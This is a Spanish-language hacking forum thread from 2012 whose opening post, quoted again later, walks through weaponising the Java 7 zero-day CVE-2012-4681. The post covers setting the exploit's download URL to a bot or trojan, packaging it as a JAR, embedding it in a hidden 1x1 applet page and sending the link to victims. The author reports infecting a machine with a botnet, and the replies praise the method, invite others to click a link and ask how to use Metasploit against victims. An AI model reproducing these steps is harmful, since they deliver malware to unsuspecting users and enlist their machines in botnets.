comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Explotando Java7 0day - Exploit .JAR

  • 12 Respuestas
  • 5474 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« en: Agosto 29, 2012, 09:57:59 pm »

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permisos para ver links. Registrate o Entra con tu cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permisos para ver links. Registrate o Entra con tu cuenta");


Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: Text
  1. <html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>

En mi caso el codigo queda de la siguiente manera:

Código: Text
  1. <html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>


Esos archivos la subimos en nuestro Host el test.jar, index.html y applet1.class, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permisos para ver links. Registrate o Entra con tu cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Septiembre 01, 2012, 12:19:16 pm por CalebBucker »
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Agosto 29, 2012, 10:50:05 pm »
Muy buena bro!
+Karma!


Desconectado WARsec

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 0
  • "tierra de libertad,casa de los valientes."
    • Ver Perfil
« Respuesta #2 en: Agosto 29, 2012, 11:09:46 pm »
Gj :))

Desconectado m0u53-01

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Agosto 30, 2012, 12:49:34 am »
muy bueno =) a ver quien es el wapo que le da clic a mi enlace =)

No tienes permisos para ver links. Registrate o Entra con tu cuenta

XDDD


salu2

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #4 en: Agosto 30, 2012, 02:11:44 pm »
Es parecido a un Exploit Kit.

Debería salirte algo asi: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Saludos.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 443
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • Ver Perfil
  • Skype: thebrowfc
« Respuesta #5 en: Agosto 30, 2012, 04:17:43 pm »
Adjunto el parche al hilo.
Twitter: @The_Pr0ph3t
pr0ph3t@hotmail.es

Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #6 en: Agosto 30, 2012, 04:23:31 pm »
El parche se encuentra disponible: No tienes permisos para ver links. Registrate o Entra con tu cuenta

De 10 personas solo 8 actualizaran.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #7 en: Agosto 30, 2012, 07:31:39 pm »
Cita de: hace 3 días
No tienes permisos para ver links. Registrate o Entra con tu cuenta

P.D.: El vídeo lo puse también para una demostración, es para complementar la información aquí presente.

Saludos.
« Última modificación: Agosto 30, 2012, 07:33:17 pm por Xt3mP »
Cada vez que me das Karma me motivas

Desconectado Mr_Pack

  • *
  • Underc0der
  • Mensajes: 59
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
    • r00tc0d3rs
    • Email
« Respuesta #8 en: Agosto 30, 2012, 08:32:44 pm »
Muy Buen Aporte  ;)

Gracias
____________________________

my best crime is myself

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #9 en: Agosto 31, 2012, 09:28:24 am »
Ya salio la actualizacion obligatoria con el parche.
Hoy mismo se estaran actualizando todas las pc con java


Desconectado CalebBucker

  • *
  • Underc0der
  • Mensajes: 158
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • Ver Perfil
    • [In]Seguridad Informatica
« Respuesta #10 en: Agosto 31, 2012, 11:48:36 am »
Código: Text
  1. Finalmente Oracle publicó ayer un parche que soluciona esta vulnerabilidad y otras tres más. Se ha conocido también que la vulnerabilidad CVE-2012-4681 fue reportada por Security Explorations hace cuatro meses. Esta misma empresa ha asegurado que la actualización de Oracle publicada ayer no cubre otras vulnerabilidades que reportaron en abril de este año.

Eso lo que dicen es cierto, porque desde hace ya un tiempo hasta ahora mis Exploit's Kit's siguen funcionando de maravillas, entonces eso quiere decir que Java NO tiene "parcheada" todas sus vulnerabilidades.

Cabe resaltar que la Vulnerabilidad 0day en Java7, aun sigue funcionando y funcionara siempre y cuando el usuario no actualize su Java.

Saludos.
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado andrewtwo

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #11 en: Agosto 31, 2012, 06:56:40 pm »
Una duda con respecto a metasploit el funcionamiento seria así: ejecuto metasploit con mi ip publica algo como 209.55.102.3 y ejecuto el exploit con esa ip, si todo va bien se inicia el servidor con la siguiente url  209.55.102.3:4444 y esa es la url que le debo enviar a la victima, una ves que el haga clic activa la conexión con mi exploit que esta en escucha  y como resultado daría una session en el metasploit, creo  que esos son los pasos a seguir o se requiere de algo adicional

Saludos  ;) 

No tienes permisos para ver links. Registrate o Entra con tu cuenta

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permisos para ver links. Registrate o Entra con tu cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo Gondvv.java y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permisos para ver links. Registrate o Entra con tu cuenta");


Ahora, abrimos el archivo applet1.java y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: Text
  1. <html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>

En mi caso el codigo queda de la siguiente manera:

Código: Text
  1. <html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>


Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permisos para ver links. Registrate o Entra con tu cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5396
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #12 en: Septiembre 19, 2012, 02:25:16 pm »
Alguien tiene el java vulnerable? ya no lo encuentro para descargar y testear


 

¿Te gustó el post? COMPARTILO!



Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 3261
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248
[Video/ing] Ms Word Office Silent Exploit Builder RECODED from scratch FUD 2016

Iniciado por simdia

Respuestas: 0
Vistas: 2013
Último mensaje Diciembre 25, 2015, 08:40:37 am
por simdia
MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit

Iniciado por Stuxnet

Respuestas: 1
Vistas: 3291
Último mensaje Octubre 24, 2014, 09:18:14 pm
por zekurity
Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

Iniciado por MaztoR

Respuestas: 0
Vistas: 1466
Último mensaje Abril 05, 2012, 09:20:06 pm
por MaztoR
Tutorial de un exploit local BOF con bypass DEP usando ROP by PerverthsO

Iniciado por PerverthsO

Respuestas: 0
Vistas: 1572
Último mensaje Marzo 04, 2013, 01:40:08 pm
por PerverthsO